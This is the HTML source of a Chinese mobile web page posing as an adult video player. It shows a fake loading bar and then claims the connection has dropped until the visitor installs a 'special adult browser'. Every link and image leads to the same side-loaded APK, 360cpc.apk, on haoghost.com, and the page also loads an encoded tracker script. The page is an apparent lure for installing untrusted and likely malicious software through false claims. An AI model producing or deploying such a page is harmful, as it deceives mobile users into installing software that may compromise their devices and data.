
<html>
<head>
<title>影片正在连接中，请稍后..........</title>
<meta content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" name="viewport"/>
<meta content="text/html; charset=utf-8" http-equiv=Content-Type>
<style>
*{margin:0; padding:0;}
html,body{ background:#000; color:#FFF; margin:0px;}
p{ margin:0; padding:0;}
.main{ width:320px; margin:10px auto 0;}
.top{ font-size:8px; position:relative;}
.top .title{ position:relative; z-index:11; margin-bottom:-12px; margin-left:20px;}
.top .pic{ position:relative; z-index:10;}
.top .pic img{ width:100%;}
.top .point{ position:relative; z-index:12; margin-left:8px; margin-top:-48px;}
.top .list1{position:relative; z-index:10;margin-top:-238px;}
.top .list1 img{width:310px;margin-left:6px;}
.msg{ width:320px; text-align:center; font-size:12px; position:relative; z-index:13; line-height:22px;}
.loading{ padding:0px; background:#000; font-style:normal; width:320px; display:block; height:250px; clear:both; font-weight:normal;  opacity:0.4;}
.loadingWord{ position:relative; z-index:14; margin-top:-195px;color:#fff;}
.loadingOver{ width:95%; height:11px; line-height:11px; background:#000; position:relative; z-index:15; margin:3px auto 0; font-size:8px; text-align:center; color:#999;}
.loading1{ border:none; text-align:center; background:none; color:#00ff00;}
.loading2{ border-style:none; padding:0px; font-family:arial; background:none; color:#00ff00; font-weight:bolder;}
.top1{margin-top:80px;width:320px;position:relative; z-index:15; text-align:center;}
.bottom{ position:relative; z-index:15; margin-top:60px; font-size:12px;width:320px}
.bottom img{width:320px;}
.bottom a{ color:#f60; text-decoration:none;}
.bottom a:hover{ color:#f60; text-decoration:underline;}
.bottom strong{margin-left:60px;}
</style>

</head>
<body>
<div class="main">

<div class="top">
<div class="title">激情成人电影院</div>

<div class="pic"><a href="http://d.haoghost.com/360cpc.apk" ><img src="images/s2/player.jpg" /></a></div>

<div class="list1"><a href="http://d.haoghost.com/360cpc.apk" ><img src="images/s2/avc.jpg" width="313" height="187"/></a></div>
</div>

<div class="msg">

<form name="loading">
<p style="display:none; margin-top:-37px;" id=isLoading>服务器已连接，正在加载影片，请稍候……
<input class="loading1" name="percent" size="4">
<br>
<input class="loading2" name="chart" size="46">
<br>
</p>
</form>

<p style="display:none;" id="isAlert"><!--none-->
<table>
<p class="loading" style=" margin-top:-250px;">
</p>

<div class="loadingWord">
<p><span>请先安装本站防封闭专用成人浏览器</span></p>
<p><a href="http://d.haoghost.com/360cpc.apk" ><img src="images/s2/down2.gif"></a></p>

<p><span>无须付费！2万部优质成人影片随意选播！<br>高清画质，缓冲快，<br>支持选片、收藏影片，下载保存，等功能。</span></p>
<p><span>请使用本站提供的专用成人浏览器，<br>获得更高清、高速体验！</span></p>

</div>

<p class="loadingOver">服务器连接断开，原因：需安装手机专用成人浏览器！</p>
</table>
</p>
<p style="display:none" id="isMsg"></p>

</div>
<div class="top1"><a href="http://d.haoghost.com/360cpc.apk" ><img src="images/s2/donw.jpg"></a></div>
<div class="bottom">
<a href="http://d.haoghost.com/360cpc.apk" ><img src="images/s2/txt.png"></a>
<strong>下载地址二</strong>(备用地址)：
<a class="left" href="http://d.haoghost.com/360cpc.apk" >进入下载&gt;&gt;</a>
</div>


<script src="js/s2player.js"></script>
<div style="display:none">
<script>
	var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cspan id='cnzz_stat_icon_1253182003'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s95.cnzz.com/stat.php%3Fid%3D1253182003' type='text/javascript'%3E%3C/script%3E"));

</script>
</div>
</body>
</html>